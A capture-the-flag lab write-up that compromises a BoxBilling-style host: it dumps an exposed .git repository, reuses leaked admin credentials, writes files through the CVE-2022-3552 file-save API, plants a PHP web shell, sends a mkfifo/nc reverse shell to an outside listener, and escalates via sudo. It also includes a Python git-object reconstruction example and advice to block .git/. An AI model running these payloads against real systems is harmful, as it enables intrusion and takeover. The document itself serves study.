CTF-200-06

Target IP: 192.168.250.27
Challenge Description: N/A.


Reconnaissance

An initial port scan shows two TCP ports open on the target: SSH and HTTP.

An aggressive scan (service and script detection) against those two ports gives more detail. I will start enumeration with the web application on port 80. A rescan of the target also turned up something useful: the web server exposes a git repository.


Enumeration

Port 80: HTTP
Browsing to http://192.168.250.27 does not show the application directly: the server refers to the virtual host name bullybox.local. I added an entry mapping 192.168.250.27 to bullybox.local in my /etc/hosts file.

With the hosts entry in place, the web application loads. I tried default credentials on its login form, but had no luck.

Inspecting the page source reveals the application version: 4.22.1.5.

I registered an account, but found nothing useful as a regular user. I will need the admin account. Maybe the git repository contains sensitive data?

Browsing to http://bullybox.local/.git returns an access denied error: the directory index is refused. That does not protect the repository, though. A tool such as git-dumper never needs the listing; it requests the known files under .git/ (HEAD, refs, index, objects) by name, and the server serves those one at a time.

Using git-dumper, I dumped the repository into a directory called dumped.

The tool recovered 611 directories and 3497 files.

Checking the HEAD commit reveals who maintains the repository: the admin's name is Yuki and their email address is admin@bullybox.local.

The file bb-config.php contains a credential pair for the user admin: admin:Playing-Unstylish7-Provided. The same file also references /bb-admin, which sounds like the admin panel.
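To make clear why refusing the /.git/ index does not protect a repository, here is an added example (my own Python, not the write-up's commands and not git-dumper's source) that reconstructs files the way a dumper does once it has fetched the pieces. It builds a throwaway repository of loose objects in a temporary directory as constructed sample data (the file names mirror this box, the password inside is a placeholder, and the branch name main is an assumption), then resolves HEAD to a commit, reads the author line, and walks the tree down to the blobs. Against a live target every one of those files would be fetched by URL: .git/HEAD, .git/refs/heads/main, .git/objects/xx/yyyy..., none of which needs a directory listing.

```python
"""Reconstruct working-tree files from loose git objects (added illustration,
not the write-up's code and not git-dumper). Sample repository is constructed."""
import hashlib
import os
import tempfile
import zlib


def write_object(git_dir, obj_type, body):
    """Store a loose object: zlib("<type> <size>\\0<body>") named by its SHA-1."""
    raw = f"{obj_type} {len(body)}\0".encode() + body
    sha = hashlib.sha1(raw).hexdigest()
    path = os.path.join(git_dir, "objects", sha[:2], sha[2:])
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "wb") as f:
        f.write(zlib.compress(raw))
    return sha


def read_object(git_dir, sha):
    """Inflate a loose object and return (type, body), checking the declared size."""
    path = os.path.join(git_dir, "objects", sha[:2], sha[2:])
    with open(path, "rb") as f:
        raw = zlib.decompress(f.read())
    header, body = raw.split(b"\0", 1)
    obj_type, size = header.decode().split(" ")
    if int(size) != len(body):
        raise ValueError(f"corrupt object {sha}")
    return obj_type, body


def tree_entry(mode, name, sha):
    """Encode one tree entry: '<mode> <name>\\0' followed by the raw 20-byte SHA-1."""
    return f"{mode} {name}\0".encode() + bytes.fromhex(sha)


def parse_tree(body):
    """Decode tree entries back into (mode, name, hex sha) tuples."""
    entries, i = [], 0
    while i < len(body):
        j = body.index(b"\0", i)
        mode, name = body[i:j].decode().split(" ", 1)
        entries.append((mode, name, body[j + 1:j + 21].hex()))
        i = j + 21
    return entries


def head_commit(git_dir):
    """Resolve HEAD (symbolic ref or bare SHA) to a commit id."""
    with open(os.path.join(git_dir, "HEAD")) as f:
        ref = f.read().strip()
    if ref.startswith("ref: "):
        with open(os.path.join(git_dir, ref[len("ref: "):])) as f:
            return f.read().strip()
    return ref


def commit_info(git_dir, commit_sha):
    """Return tree id, author line and message of a commit (what 'checking HEAD' reveals)."""
    obj_type, body = read_object(git_dir, commit_sha)
    if obj_type != "commit":
        raise ValueError(f"{commit_sha} is a {obj_type}, not a commit")
    headers, _, message = body.decode().partition("\n\n")
    info = {"message": message.strip()}
    for line in headers.splitlines():
        key, _, value = line.partition(" ")
        if key in ("tree", "author"):
            info[key] = value
    return info


def walk_tree(git_dir, tree_sha, prefix=""):
    """Recursively map every path under a tree to its blob contents."""
    files = {}
    for mode, name, sha in parse_tree(read_object(git_dir, tree_sha)[1]):
        if mode.startswith("40"):  # mode 40000 = subdirectory, recurse
            files.update(walk_tree(git_dir, sha, prefix + name + "/"))
        else:
            files[prefix + name] = read_object(git_dir, sha)[1]
    return files


def build_sample_repo():
    """Constructed repository: paths mirror the write-up, the secret is a placeholder."""
    git_dir = os.path.join(tempfile.mkdtemp(), ".git")
    os.makedirs(os.path.join(git_dir, "refs", "heads"))
    config = write_object(git_dir, "blob", b"<?php\n$db_password = 'placeholder-not-real';\n")
    admin = write_object(git_dir, "blob", b"<?php\n// admin panel entry point (constructed)\n")
    sub = write_object(git_dir, "tree", tree_entry("100644", "index.php", admin))
    root = write_object(git_dir, "tree", tree_entry("40000", "bb-admin", sub)
                        + tree_entry("100644", "bb-config.php", config))
    commit = write_object(git_dir, "commit", (
        f"tree {root}\n"
        "author Yuki <admin@bullybox.local> 1700000000 +0000\n"
        "committer Yuki <admin@bullybox.local> 1700000000 +0000\n"
        "\nInitial commit\n").encode())
    with open(os.path.join(git_dir, "HEAD"), "w") as f:
        f.write("ref: refs/heads/main\n")  # branch name is an assumption
    with open(os.path.join(git_dir, "refs", "heads", "main"), "w") as f:
        f.write(commit + "\n")
    return git_dir


def dump_repo(git_dir):
    """What a dumper does after fetching HEAD, the ref and the objects: (author, {path: bytes})."""
    info = commit_info(git_dir, head_commit(git_dir))
    return info["author"], walk_tree(git_dir, info["tree"])


if __name__ == "__main__":
    author, files = dump_repo(build_sample_repo())
    print("HEAD author:", author)
    for path, content in sorted(files.items()):
        print(f"{path}: {content!r}")
```

Real repositories also keep objects in packfiles and refs in packed-refs, and the .git/index lists every tracked path; git-dumper fetches those too, which this toy skips. The defensive takeaway is the same either way: block the whole .git/ prefix (or never deploy it), because denying only the directory listing leaves every file inside reachable by name.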

Browsing to http://bullybox.local/bb-admin displays the admin login page. Its footer again lists the application version, 4.22.1.5.

And bingo! The credentials admin:Playing-Unstylish7-Provided work, and I now have access to the web application as the admin user. With admin credentials and a confirmed application version, it is time to search for known vulnerabilities.

Searching for this version shows the application is vulnerable to remote code execution reachable from the admin panel, tracked as CVE-2022-3552.


Exploitation, Privilege Escalation, and Flag

I found a public PoC for this CVE and tried it against the target machine.

The PoC makes a POST request to /api/admin/Filemanager/save_file with the body order_id=1&path=ax.php&data=<%3fphp+phpinfo()%3b%3f> (the data parameter is URL-encoded <?php phpinfo();?>). The API returned true: the file was written as ax.php directly under the web root, with no check on its extension or location.

Browsing to http://bullybox.local/ax.php now displays the phpinfo() output, which confirms the server executes the uploaded PHP file. Time to upload a web shell.

Next I uploaded a minimal PHP web shell, URL-encoded as <%3fphp+echo+system($_GET['cmd'])%3b%3f> (that is, <?php echo system($_GET['cmd']);?>), under the name shell.php. The upload succeeded.

The web shell is reachable at http://bullybox.local/shell.php. Passing id;whoami;ls in the cmd parameter executed the commands and returned their output. Time to upgrade to a reverse shell.

I started a listener on my machine on port 80, a port that outbound firewall rules rarely block. Then, through the web shell, I sent the URL-encoded nc reverse shell rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fbash%20-i%202%3E%261%7Cnc%20192.168.45.176%2080%20%3E%2Ftmp%2Ff, which decodes to rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 192.168.45.176 80 >/tmp/f. The listener received a connection and I have a shell as the user yuki: a foothold on the target machine.

There is no local.txt flag on this machine. Running sudo -l shows that yuki can run any command as root, so sudo bash spawns a root shell. The only flag on this machine is proof.txt, which I could read once root.